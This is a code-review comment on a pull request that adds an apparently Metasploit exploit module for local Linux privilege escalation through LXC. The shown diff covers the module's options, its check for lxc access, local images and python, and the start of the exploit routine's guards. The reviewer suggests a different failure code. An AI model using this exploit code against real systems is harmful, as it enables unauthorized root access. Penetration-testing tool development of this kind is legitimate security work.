modules/exploits/linux/local/lxc_privilege_escalation.rb

```diff
@@ -0,0 +1,170 @@
+                     ])
+    register_advanced_options([
+                                  OptBool.new('ForceExploit', [false, 'Override check result', false]),
+                                  OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']),
+                              ])
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  # Get the base image used to create the container
+  def base_image
+    if datastore['BaseImage'].blank?
+      # Select the first image we find, the only requirement is that we can run chroot inside of it, so any container should suffice
+      cmd_exec('lxc image list -c f --format csv| head -n1').strip
+    else
+      datastore['BaseImage'].to_s
+    end
+  end
+
+  # Check we have all the prerequisites to perform the priv esc
+  def check
+    # Check if we can execute lxc list
+    unless cmd_exec('lxc list && echo true') =~ /true$/
+      print_good('LXC is not accessible by current user.')
+      Exploit::CheckCode::Safe
+      return
+    end
+
+    # Check if there is a locally available image we can use, we need at least one image so we can create a container
+    local_images = cmd_exec('lxc image list -c fd --format csv')
+    local_image_count = local_images.each_line.size
+    vprint_status("Found #{local_image_count} local images:\n" + local_images)
+
+    if local_image_count == 0
+      # No local images found, suggest one is downloaded
+      print_error('There are no local images we can use, please download an image such as alpine or ubuntu.')
+      Exploit::CheckCode::Safe
+      return
+    end
+
+    # Check if python
+    # exists as it's required for the exploit to function
+    path = cmd_exec('command -v python')
+    unless path.start_with? '/'
+      print_error('This exploit requires python, but the python binary was not found')
+      Exploit::CheckCode::Safe
+      return
+    end
+
+    print_good('LXC is accessible, and there is at least one local image we can use to create a container')
+    Exploit::CheckCode::Vulnerable
+  end
+
+  # Execute an LXC command and return true if successful
+  def execute(cmd)
+    vprint_status(cmd)
+    result = cmd_exec(cmd)
+    vprint_status(result)
+    not (result.include? "Error: ")
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    unless base_image
+      fail_with Failure::NotVulnerable, 'Could not find a base image to use'
```

Comment:
```suggestion
      fail_with Failure::NoTarget, 'Could not find a base image to use'
```

I think this provides the user a bit more context about the configuration of the box and what could be done to move exploitation forward.